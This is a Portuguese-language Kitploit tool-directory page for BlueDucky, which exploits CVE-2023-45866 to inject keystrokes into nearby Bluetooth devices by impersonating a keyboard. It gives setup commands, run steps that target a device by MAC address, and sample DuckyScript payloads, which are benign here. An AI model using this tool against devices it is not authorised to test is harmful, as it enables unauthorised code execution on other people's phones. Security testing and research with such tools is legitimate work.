Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
BlueDucky — BlueDucky explora uma vulnerabilidade Bluetooth, especificamente CVE-2023-45866, que permite a um atacante injetar pressionamentos de teclas em um dispositivo alvo. O dispositivo do atacante se faz passar por um teclado Bluetooth para estabelecer uma conexão criptografada sem autorização do usuário. A ferramenta BlueDucky automatiza esse processo. | Kitploit
Ferramentas/GitHubGitHub/sergeb250/blueducky
Segurança BluetoothGeração de PayloadsExploraçãoSegurança Sem FioTestes de PenetraçãoRed Teaming
GitHubsergeb250/blueducky

BlueDucky

Ver Repositório
11há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

BlueDucky explora uma vulnerabilidade Bluetooth, especificamente CVE-2023-45866, que permite a um atacante injetar pressionamentos de teclas em um dispositivo alvo. O dispositivo do atacante se faz passar por um teclado Bluetooth para estabelecer uma conexão criptografada sem autorização do usuário. A ferramenta BlueDucky automatiza esse processo.

Compartilhar

BlueDucky Ver 2.1 (Android) 🦆

Agradecimentos a todas as pessoas do HackNexus. Certifique-se de se juntar a nós no VC ! https://discord.gg/HackNexus

NOTAS: Não poderei executar isto num portátil ou outro dispositivo que não seja um raspberry pi para testes. Devido a isso, quaisquer problemas que tenhas terão de ser resolvidos entre vocês, pois não tenho fundos extras para comprar um adaptador.

  1. saad0x1's GitHub
  2. spicydll's GitHub
  3. lamentomori's GitHub

🚨 CVE-2023-45866 - Implementação BlueDucky (Usando DuckyScript)

🔓 Emparelhamento Não Autenticado Levando à Execução de Código (Usando Teclado HID)

Esta é uma implementação do CVE descoberto por marcnewlin

Introdução 📢

BlueDucky é uma ferramenta poderosa para explorar uma vulnerabilidade em dispositivos Bluetooth. Ao executar este script, você pode:

  1. 📡 Carregar dispositivos Bluetooth salvos que não estão mais visíveis, mas que ainda têm Bluetooth ativado.
  2. 📂 Salvar automaticamente quaisquer dispositivos que você escaneie.
  3. 💌 Enviar mensagens através do formato ducky script para interagir com dispositivos.

Executei isto com sucesso num Raspberry Pi 4 usando o módulo Bluetooth padrão. Funciona contra vários telemóveis, com uma exceção interessante para uma marca da Nova Zelândia, a Vodafone.

Instalação e Uso 🛠️

Instruções de Configuração para Sistemas Baseados em Debian

root@kitploit:~
# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Instruções de Configuração para Sistemas Baseados em Arch

root@kitploit:~
# update pacman & packages
sudo pacman -Syyu

# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
               python-setuptools python-pydbus python-dbus
               git gcc python-pip \

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Executando o BlueDucky

root@kitploit:~
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

alternativamente,

root@kitploit:~
pip3 install -r requirements.txt

Passos Operacionais 🕹️

  1. Ao executar, ele solicita o endereço MAC do alvo.
  2. Não pressionar nada dispara uma varredura automática por dispositivos.
  3. Dispositivos encontrados anteriormente são armazenados em known_devices.txt.
  4. Se known_devices.txt existir, ele verifica esse arquivo antes de escanear.
  5. Executa usando o arquivo payload.txt.
  6. Uma execução bem-sucedida resultará em conexão automática e execução do script.

DuckyScript 💻

🚧 Em andamento:

  • Sugira-me ideias

Versão 2.1 🐛

  • Interface atualizada
  • Experiência do Usuário melhorada
  • Depurador Bluetooth; Verifica seus adaptadores bluetooth e dependências instaladas antes de permitir o acesso à aplicação, isto para evitar dispositivos não suportados.
  • Por favor, note: Numerosas alterações foram feitas, consulte o histórico de commits para alterações específicas.

O Que Está Planejado para a Próxima Versão?

  • Console DuckyScript integrado para ataques que desejam manter persistência, após a execução de um payload
  • Sugira o que deve ser adicionado a seguir! Junte-se a https://discord.gg/HackNexus

📝 Exemplo de payload.txt:

root@kitploit:~
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
root@kitploit:~
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

Divirta-se experimentando o BlueDucky! 🌟

Baixar ferramenta